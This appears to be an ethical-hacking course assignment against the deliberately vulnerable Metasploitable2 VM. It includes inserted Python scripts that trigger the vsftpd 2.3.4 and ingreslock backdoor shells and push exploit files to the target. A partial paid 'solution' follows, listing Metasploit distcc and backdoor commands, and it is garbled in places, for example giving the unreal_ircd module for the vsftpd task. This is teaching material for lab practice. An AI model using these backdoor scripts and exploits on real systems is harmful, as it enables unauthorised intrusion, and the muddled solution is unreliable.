Info3002 Ethical Hacking Principles and Practice

Pentesting Project

Due: 9pm, Friday, 10 June 2022
In this project, you will mainly pentest the Metasploitable2 VM by accomplishing the tasks described below. The tasks in this document will be a little harder than what you have seen in our lectures and labs. However, the basic skills involved are similar.
Since pentesting is exploratory by nature, you should try to complete the tasks without seeking help from tutors. There are hints and notes within this document to help you. Beyond these, do your own research first if you have difficulty completing a task. For instance, if you do not know the usage of the 'xxx' command and its options, use 'man xxx' to find out. After you have tried almost everything and still cannot figure it out, limited help can be obtained from tutors.
Write your answers for all tasks into a project report. When asked to grab a screenshot in a task, the screenshot must include the VM name, which includes your Student ID. If you are using VMs created on your own laptop, then the screenshot must show the IP address of the target somewhere. For instance, the target IP can appear in your command line, or, if the command line does not include the target IP, you can run the 'ip a' command to display the IP address deliberately. An exemplar screenshot is included as follows. Failing to do so will cause you to lose marks for the relevant tasks.


You are advised to read the entire specification first, and then start with the tasks that are already covered by our lectures, especially Task 6.
1 General Hacking Capability [2 marks]
1.1 Give your answer to the following cryptogram, and attach at least two screenshots of your own handwriting (one during the solving process and the other of the final result) to prove that you solved it yourself. If you have forgotten what a cryptogram is, refer to the last task of Lab 1. Since you cannot play it using the website (you have to use paper and pencil), we offer you a hint: 'Q' is 'T'. [1 mark]

This project is of individual work. By working on this project, you promise
that you will never ask or offer inappropriate help from/to others.



1.2 Give your answer to the following matchstick puzzle. You are only allowed to move one matchstick
to make the equation hold. All matchsticks have to be used, and you shouldn’t make it an inequality. We
emphasize again that you should not ask or share your answers with others. [1 mark]
2 Service and Vulnerability Detection [3 marks]
2.1 If you use nmap to scan all TCP ports of Metasploitable2 instead of the default 1000 ports, it will show that port 8787 is open. Suppose you are interested in knowing which service is running on this TCP port. Use nmap to scan only this port to find out. [1 mark]
a) Include a screenshot showing your command line and its output.
b) Then, based on the output, describe in your own words the detected service and software version in your report.

2.2 In GVM, explore its interface to create a port list with all TCP ports XXXXXXXXXXincluded (let's ignore port 0, which is a port number not supported by all OS kernels). Name this port list 'All TCP Ports'. Then, create a target for scanning the Metasploitable2 VM with this port list. Finally, create a task to scan this target with 'Full and Fast' as the Scan Config.
a) Detail your steps for achieving the above in your project report and include one screenshot each for port list creation, target creation and task creation. [1 mark]
b) Complete the scan task created above, and obtain the PDF report from this scan. Compare this report (denoted Report 1) with the report you obtained from Lab 4 Task 4.8 (denoted Report 2). Detail how you made the comparison, and give at least one TCP port that has severity 'High' results in Report 1 but is not listed in Report 2. Also, list the severity 'High' results from that port. [1 mark]

3 Exploitation [3 marks]
3.1 The "Metasploitable 2 Exploitability Guide" (https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide) gives a great tutorial on how to exploit the Metasploitable2 VM. Please read through this guide, and focus especially on the 'Services: Backdoors' section. Then, accomplish the following tasks.
a) The 'Services: Backdoors' section first describes how to manually exploit the backdoor in the tampered FTP server VSFTPD v2.3.4. Follow it to complete the exploitation on your Metasploitable2 using 'nc' instead of 'telnet'. Detail your steps and include a screenshot of your success. This screenshot should include the 'nc' command line, and the results of executing the following commands after gaining access: 'id', 'ip addr show dev eth0', and 'hostname'. [1 mark]
Note:
The 'telnet' client is typically no longer installed on current Linux distributions, Kali included. This is why you are asked to use the 'nc' command instead. The 'nc' command runs the 'netcat' tool, which is very flexible and is dubbed 'the Swiss army knife for networking'. The 'netcat' tool will be covered in Week 7's lecture.

b) The 'Services: Backdoors' section also describes how to exploit the old standby "ingreslock" backdoor that is listening on port 1524. Use the 'netcat' tool instead of 'telnet' to accomplish this exploitation. Detail your steps and include a screenshot of your success. This screenshot should include the 'netcat' command line, and the results of executing the following commands after gaining access: 'whoami', 'ip a show dev eth0', and 'pwd'. [1 mark]
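The following is an added example, not part of the assignment or of the Exploitability Guide: the two backdoor exchanges of Task 3.1 driven from a Python script instead of typed into nc. It assumes the standard Metasploitable2 layout (FTP on 21, the vsftpd backdoor shell on 6200, ingreslock on 1524) and the documented trigger for the vsftpd backdoor, a ':)' at the end of the FTP username; against the real VM you supply its IP. FakeBackdoorHost is a constructed loopback stand-in so the script runs offline, and its command output is made up, not a capture from the VM.

```python
"""Added example: Task 3.1's two backdoor shells driven from Python instead of nc.
Not the assignment's or the Exploitability Guide's code.  Ports for the real VM
are assumptions (21, 6200, 1524); FakeBackdoorHost is a constructed loopback
stand-in with made-up command output so the script runs offline."""
import socket
import threading

FTP_PORT = 21
VSFTPD_SHELL_PORT = 6200   # /bin/sh bound here by the tampered vsftpd 2.3.4
INGRESLOCK_PORT = 1524     # the 'ingreslock' bind shell, needs no trigger

# Constructed sample replies for the fake shell (not a capture from the VM).
FAKE_OUTPUT = {
    "id": "uid=0(root) gid=0(root)",
    "whoami": "root",
    "hostname": "metasploitable",
    "pwd": "/",
}


def trigger_vsftpd_backdoor(host, port=FTP_PORT, timeout=3.0):
    """Log in with a username ending in ':)', the documented vsftpd 2.3.4
    trigger; mirrors 'nc HOST 21' plus typing USER/PASS.  Returns the banner
    and the reply to USER.  PASS gets no reply, so we do not wait for one."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024).decode(errors="replace").strip()
        s.sendall(b"USER backdoored:)\r\n")
        user_reply = s.recv(1024).decode(errors="replace").strip()
        s.sendall(b"PASS invalid\r\n")
    return banner, user_reply


def run_over_bind_shell(host, port, commands, timeout=3.0):
    """Connect to a raw bind shell (what 'nc HOST PORT' does), send COMMANDS
    and return everything the shell wrote back.  'exit' plus a half-close
    makes the remote sh terminate, so recv() sees EOF instead of hanging."""
    script = "".join(cmd + "\n" for cmd in commands) + "exit\n"
    received = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(script.encode())
        s.shutdown(socket.SHUT_WR)
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break                     # quiet shell: give up rather than hang
            if not chunk:
                break
            received.append(chunk)
    return b"".join(received).decode(errors="replace")


class FakeBackdoorHost:
    """Loopback stand-in for Metasploitable2: a fake FTP front door that
    records whether the ':)' trigger arrived, and a fake bind shell."""

    def __init__(self):
        self.triggered = False
        self.ftp_port = self._listen(self._serve_ftp)
        self.shell_port = self._listen(self._serve_shell)

    @staticmethod
    def _listen(handler):
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.bind(("127.0.0.1", 0))        # ephemeral high port, no sudo needed
        srv.listen(5)

        def accept_loop():
            while True:
                conn, _ = srv.accept()
                with conn:
                    try:
                        handler(conn)
                    except OSError:
                        pass              # client went away mid-exchange

        threading.Thread(target=accept_loop, daemon=True).start()
        return srv.getsockname()[1]

    def _serve_ftp(self, conn):
        conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
        user_line = conn.recv(1024)
        self.triggered = b":)" in user_line   # real backdoor would now bind 6200
        conn.sendall(b"331 Please specify the password.\r\n")
        conn.recv(1024)                       # PASS: swallowed, never answered

    def _serve_shell(self, conn):
        pending = b""
        while True:
            data = conn.recv(4096)
            if not data:
                return
            pending += data
            while b"\n" in pending:
                line, pending = pending.split(b"\n", 1)
                cmd = line.decode(errors="replace").strip()
                if cmd == "exit":
                    return
                reply = FAKE_OUTPUT.get(cmd, "sh: %s: not found" % cmd)
                conn.sendall((reply + "\n").encode())


def demo_against_fake_host():
    """The whole Task 3.1(a) exchange on loopback; returns what a screenshot would show."""
    box = FakeBackdoorHost()
    banner, user_reply = trigger_vsftpd_backdoor("127.0.0.1", box.ftp_port)
    output = run_over_bind_shell("127.0.0.1", box.shell_port, ["id", "hostname", "pwd"])
    return {"banner": banner, "user_reply": user_reply,
            "triggered": box.triggered, "shell_output": output}


if __name__ == "__main__":
    print(demo_against_fake_host())
```

Against the VM, call trigger_vsftpd_backdoor(TARGET) and then run_over_bind_shell(TARGET, VSFTPD_SHELL_PORT, ["id", "ip addr show dev eth0", "hostname"]); the ingreslock shell needs no trigger, so run_over_bind_shell(TARGET, INGRESLOCK_PORT, ["whoami", "ip a show dev eth0", "pwd"]) on its own is Task 3.1(b). The script appends 'exit' and half-closes the socket so the remote sh terminates on its own; with plain nc you would otherwise end the session with Ctrl-C.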

3.2 Your GVM report for Metasploitable2 obtained in Task 2.2 should show the 'distcc Remote Code Execution Vulnerability' on TCP port 3632. Follow Section 6 Steps 1-5 of the following tutorial, https://www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson2/index.html, to exploit this vulnerability. Detail your steps and include a screenshot of your success. This screenshot should include the results of executing the following commands after gaining access: 'whoami' and 'ip a show dev eth0'. [1 mark]
Note: The 'BackTrack' mentioned in this tutorial is the previous name of Kali Linux, and the tutorial runs everything as root. Since Kali 2020 the default user is no longer root, so prefix 'msfconsole' with 'sudo' to follow the steps as written.

4 Post Exploitation [3 marks]
After completing Task 3.2, you will notice that the user account you get is 'daemon', not 'root'. Follow Section 6 Steps 6-10 of the tutorial mentioned in Task 3.2 to escalate your privileges to 'root'. Detail your steps and include a screenshot of your success. This screenshot should include the results of executing the following commands in the obtained 'netcat' session: 'whoami' and 'ip a show dev eth0'. The points where you should deviate from this tutorial are given in the hints below. [3 marks]
Hints:
• Since the VMs in our school cloud may not be allowed to reach exploit-db.com, obtain 'exploit-8572.c' by another method. We recommend using 'searchsploit' to find it in the local copy of exploit-db in your Kali, where it is named '8572.c'. Refer to Lecture 5 about 'searchsploit'.
• To upload '8572.c' to Metasploitable2, there are several methods. Here we suggest netcat, which is available on both Metasploitable2 and Kali. Basically, in your Kali, open a new terminal, run 'netcat' in server mode to serve this file, and finally hit 'Ctrl+C' to end the transmission when you judge that it is over (netcat does not necessarily close the connection once the file has been sent, so both ends may simply keep waiting). In the remote shell you obtained in Task 3.2, run 'netcat' in client mode to receive this file; after the transmission is over, use 'ls -l' on both sides to check that the received file has the same size as the original.

• In Linux, sometimes you don't see responses to your commands, but you should still proceed. Check whether a step succeeded by issuing a command that verifies the result (for example 'ls -l' after a transfer).
• Since Kali 2020, 'sudo' is needed when running 'netcat' in server mode on a privileged port (below 1024); listening on a high port such as 4444 does not require it.
This task is very challenging. Be very careful and make sure you understand every step. You can also watch the following video on YouTube to get a clearer idea of this privilege escalation: https://www.youtube.com/watch?v=DoUZFHwZntY
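The following is an added example, not from the assignment or the tutorial it cites: the netcat-style push from the second hint written as a Python sender and receiver, so that the reason for the Ctrl+C and for the 'ls -l' check is visible in code. The sender listens (the hint's 'server mode') and closes the connection once the file has been sent, so the receiver sees end-of-file and nobody has to guess when the transfer is over; both copies are then compared by size and SHA-256. It runs entirely on loopback with a constructed random file standing in for 8572.c; the file names and the port are assumptions.

```python
"""Added example (not the assignment's code): a netcat-style file push from
Kali to the target, with the size/hash check that netcat does not give you.
Runs on loopback; the sample file is constructed, not the real 8572.c."""
import hashlib
import os
import socket
import tempfile
import threading


def sha256_of(path):
    """Hex SHA-256 of a file, read in 64 KiB blocks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(65536), b""):
            h.update(block)
    return h.hexdigest()


def serve_file_once(path, bind="127.0.0.1", port=0):
    """Sender, the role 'nc -l -p PORT < FILE' plays on Kali.

    Accepts one client, streams the file, then closes the connection.  The
    close is what tells the receiver it has everything; traditional netcat
    leaves the connection open, hence the Ctrl+C in the hint.  Returns the
    bound port (ephemeral and above 1024 by default, so no sudo is needed)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind, port))
    srv.listen(1)

    def push():
        conn, _ = srv.accept()
        with conn, open(path, "rb") as f:
            conn.sendfile(f)          # whole file, then the 'with' closes the socket
        srv.close()

    threading.Thread(target=push, daemon=True).start()
    return srv.getsockname()[1]


def receive_file(host, port, dest, timeout=10.0):
    """Receiver, the role 'nc HOST PORT > FILE' plays on Metasploitable2.
    Reads until the sender closes and returns the number of bytes written."""
    written = 0
    with socket.create_connection((host, port), timeout=timeout) as s, \
            open(dest, "wb") as out:
        while True:
            chunk = s.recv(65536)
            if not chunk:             # EOF: sender closed, transfer complete
                break
            out.write(chunk)
            written += len(chunk)
    return written


def transfer_and_verify(src, dest, host="127.0.0.1"):
    """Push SRC to DEST over TCP and verify the copy the way 'ls -l' plus a
    checksum on both sides would."""
    port = serve_file_once(src, bind=host)
    received = receive_file(host, port, dest)
    return {
        "bytes": received,
        "size_matches": received == os.path.getsize(src),
        "hash_matches": sha256_of(src) == sha256_of(dest),
    }


def demo():
    """Constructed sample: 70000 random bytes stand in for 8572.c (the size
    spans several recv() calls, so partial reads are exercised too)."""
    workdir = tempfile.mkdtemp()
    src = os.path.join(workdir, "sample.c")
    dest = os.path.join(workdir, "sample.c.received")
    with open(src, "wb") as f:
        f.write(os.urandom(70000))
    return transfer_and_verify(src, dest)


if __name__ == "__main__":
    print(demo())
```

On the real VMs the receiving end stays the target's own netcat ('nc KALI_IP PORT > 8572.c' in the shell from Task 3.2); it is compatible with this sender because the transfer is nothing more than a TCP byte stream followed by a close, and the receiver's netcat exits when the sender closes. Bind the sender to a port above 1024 and no sudo is involved. To verify on the target, compare 'ls -l 8572.c' and 'md5sum 8572.c' there with the same commands on Kali.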
5 Web Pentesting [4 marks]
In our lectures and labs, we used DVWA as our web pentesting target. In this project, you will be asked to pentest another intentionally vulnerable web application called 'Mutillidae', which is also installed in Metasploitable2.
The use of Mutillidae is straightforward. Simply enter the following URL into Firefox: http://<IP of Metasploitable2>/mutillidae/, and you will see the Mutillidae interface. If you see warning messages from the database, click the 'Reset DB' link in the Mutillidae interface to restore the database to its initial state; those warning messages should then disappear. Note that, unlike DVWA, you do not need to log in to Mutillidae to access its pages. Also note that the default security level of Mutillidae is '0' (the lowest security level) when you start browsing this application (see the screenshot below). This is the security level you should use during your pentest, and you should leave it as it is, i.e., never toggle it.



Mutillidae contains pages corresponding to the OWASP Top 10 Security Risks. These pages can be accessed from the 'OWASP Top 10' menu on the left. In this project, you are only required to
Answered 6 days After Jun 08, 2022

Solution

Jahir Abbas answered on Jun 10 2022
94 Votes
1.
Lab 1 is not supplied for the cryptogram.
Make/Replace 65 with 66, taking the one from the 91's 1; then the equation will hold equality:
66 – 57 = 9
2.
3.
3.1)
a.
Manually exploit the backdoor in the tampered FTP server VSFTPD v2.3.4
The backdoored version will open a listening shell on port 6200
Commands –
netcat 192.168.99.131 6200
msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST 192.168.99.131
exploit
3.1)
b.
Exploit the old standby "ingreslock" backdoor that is listening on port 1524
Commands –
netcat 192.168.99.131 1524
whoami
ip a show dev eth0
pwd
id
3.2
Show the 'distcc Remote Code Execution Vulnerability' on TCP port 3632
Commands –
1. Start up Metasploit msfconsole (perform on BackTrack)
   · Instructions:
     1. msfconsole
   · Note (FYI):
     1. Metasploit takes about 5 to 20 seconds to start up.
     2. Your picture (Rabbit, Cow, Graffiti, Cyber Missile, etc.) will probably be different than mine.
2. Choose Metasploit module
   · Instructions:
     1. search distcc
     2. use exploit/unix/misc/distcc_exec
   · Note (FYI):
     1. This is the name of the exploit that will be used to attack the DistCC Daemon Command.
3. Choose Metasploit payloads
   · Instructions:
     1. show payloads
     2. set payload cmd/unix/bind_ruby
   · Note (FYI):
     1. A...